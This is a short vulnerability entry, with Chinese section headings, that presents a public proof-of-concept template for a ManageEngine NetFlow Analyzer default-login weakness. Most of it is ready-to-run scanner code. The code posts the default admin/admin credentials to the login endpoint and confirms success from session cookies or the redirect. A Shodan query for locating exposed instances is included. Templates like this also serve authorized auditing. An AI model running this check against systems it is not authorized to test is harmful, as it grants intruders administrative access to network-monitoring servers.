漏洞描述
Netflow Analyzer default login was discovered.
netflow-default-login: Netflow Analyzer - Default Login
PoC代码[已公开]
id: netflow-default-login
info:
name: Netflow Analyzer - Default Login
author: DhiyaneshDK
severity: high
description: |
Netflow Analyzer default login was discovered.
classification:
cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zohocorp
product: manageengine_netflow_analyzer
shodan-query: html:"Login - Netflow Analyzer"
tags: default-login,netflow,misconfig,vuln
http:
- raw:
- |
POST /netflow/jspui/j_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
radiusUserEnabled=false&AUTHRULE_NAME=Authenticator&j_username={{username}}&j_password={{password}}&Submit=Login
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: set_cookie
words:
- "NFA_Jsession="
- "JSESSIONID"
condition: or
- type: word
part: location
words:
- "/netflow;jsessionid"
# digest: 490a004630440220779ae5c43ad3d574f5112d3472e0067904f9a03a428137a8953a3e37e82611c9022076dcba5ed16b5e6c1236affb3c315f0f4af235a7a844c6b337c5c8a581afb65b:922c64590222798bb761d5b6d8e72950